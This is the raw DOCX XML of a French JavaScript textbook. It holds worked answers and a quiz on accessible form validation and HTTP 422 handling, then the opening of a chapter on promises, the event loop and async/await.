        </w:rPr>
        <w:t>Un utilisateur a rempli huit champs et reçoit « erreur ».</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Rédigez un résumé exploitable.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Conservez les valeurs.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Replacez le focus.</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28.1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const regles = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { test: v =&gt; v.length &gt;= 12, message: "12 caractères minimum." },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { test: v =&gt; /[0-9]/.test(v), message: "Au moins un chiffre." },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { test: v =&gt; /[A-Z]/.test(v), message: "Au moins une majuscule." },</w:t>
        <w:br/>
        <w:t>];</w:t>
        <w:br/>
        <w:br/>
        <w:t>function valider(champ, zone) {</w:t>
        <w:br/>
        <w:t>const manquantes = regles.filter(r =&gt; !r.test(champ.value)).map(r =&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    r.message);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  zone.textContent = manquantes.join(" ");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champ.setAttribute("aria-invalid", String(manquantes.length &gt; 0));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  champ.setCustomValidity(manquantes.length ? manquantes.join(" ") : "");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return manquantes.length === 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque règle est indépendante : l'utilisateur voit toutes les contraintes manquantes d'un coup, pas une par une.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le message reste dans une zone liée par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-describedby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, ce qui évite de perturber la saisie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 28.2</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async function envoyer(donnees) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reponse = await fetch("/api/commande", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    method: "POST",</w:t>
        <w:br/>
        <w:t>headers: { "Content-Type": "application/json", Accept: "application/json" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    body: JSON.stringify(donnees),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  if (reponse.status === 422) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const { erreurs } = await reponse.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw new ValidationError(erreurs);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!reponse.ok) throw new Error(`Erreur serveur ${reponse.status}`);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  return reponse.json();</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code 422 est distinct d'une erreur serveur : il transporte des erreurs de validation exploitables champ par champ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une erreur réseau (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) n'a pas de statut : elle doit être distinguée d'une réponse HTTP en erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 28.3</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&lt;div id="resume-erreurs" role="alert" tabindex="-1" hidden&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;&lt;strong&gt;2 champs nécessitent une correction :&lt;/strong&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="#email"&gt;L'adresse électronique est incomplète.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="#cp"&gt;Le code postal doit comporter cinq chiffres.&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le résumé indique le nombre d'erreurs et permet d'y accéder directement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les valeurs restent dans les champs : aucune réinitialisation tant que l'envoi n'a pas réussi.</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Quelle propriété indique qu'un champ obligatoire est vide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validity.typeMismatch</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validity.valueMissing</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validity.tooShort</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validity.patternMismatch</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 xml:space="preserve">Que se passe-t-il si </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setCustomValidity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est jamais réinitialisé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Rien</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 champ reste invalide définitivement</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 formulaire s'envoie deux fois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 message disparaît</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Quand afficher une erreur de saisie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À chaque caractère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À la sortie du champ ou à l'envoi</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Uniquement au rechargement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Jamais</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 signifie un code 422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Succès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Requête bien formée mais données invalides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Erreur de connexion</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Redirection</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 faire des données saisies quand l'envoi échoue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Les effacer</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Les conserver</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Les chiffrer</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Les envoyer à nouveau automatiquement</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>valueMissing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspond à l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non satisfait.</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Le message personnalisé persiste et bloque la validation même après correction.</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Signaler pendant la frappe est agressif ; à la sortie du champ, le message est utile.</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422 Unprocessable Entity signale une validation échouée côté serveur.</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Conserver la saisie évite à l'utilisateur de tout recommencer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">29. Asynchrone : promesses et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Écrire du code qui attend sans bloquer, et gérer les erreurs au bon endroit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 28</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Expliquer la boucle d'événements et la pile d'appels.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Créer et consommer des promesses.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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans perdre la gestion d'erreurs.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Lancer des opérations en parallèle.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Éviter les attentes inutiles et les blocages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>29.1 Pourquoi l'asynchrone existe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JavaScript s'exécute sur un seul fil. Une opération lente exécutée de façon synchrone gèle l'interface : impossible de cliquer, de défiler ou même de voir un indicateur de chargement. L'asynchrone consiste à rendre la main au navigateur pendant l'attente.</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BOUCLE D'ÉVÉNEMENTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mécanisme qui exécute le code synchrone, puis vide les files de tâches (promesses, minuteurs, événements) dès que la pile est libre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f37.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.37 — Le trajet d'une opération asynchrone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>L'ordre d'exécution n'est pas l'ordre d'écriture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console.log("1");</w:t>
        <w:br/>
        <w:t>setTimeout(() =&gt; console.log("3"), 0);</w:t>
        <w:br/>
        <w:t>console.log("2");</w:t>
        <w:br/>
        <w:t>// Affiche 1, 2, 3 : le minuteur passe après le code synchrone</w:t>
        <w:br/>
        <w:br/>
        <w:t>console.log("A");</w:t>
        <w:br/>
        <w:t>Promise.resolve().then(() =&gt; console.log("C"));</w:t>
        <w:br/>
        <w:t>console.log("B");</w:t>
        <w:br/>
        <w:t>// Affiche A, B, C : la microtâche passe avant le minuteur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>29.2 Trois états d'une promesse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une promesse représente une valeur future. Elle est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>en attente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tenue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (résolue) ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rejetée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Une fois settled, son état ne change plus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le squelette d'une promesse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const promesse = new Promise((resolve, reject) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reussite = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (reussite) resolve("valeur");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  else reject(new Error("échec"));</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>promesse</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .then(valeur =&gt; console.log("OK", valeur))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .catch(erreur =&gt; console.error("KO", erreur.message))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .finally(() =&gt; console.log("Terminé, succès ou échec"));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.89 — Sept méthodes de promesse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64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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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279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Retour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>then</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traite la valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nouvelle promesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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catch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Traite le rejet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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Nouvelle promesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>finally</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exécute dans tous les cas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Promesse d'origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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Promise.all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Toutes, ou échec global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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Tableau de valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise.allSettled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toutes, succès et échecs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2798"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tableau de statuts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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Promise.race</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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La première, succès ou échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="279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Une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
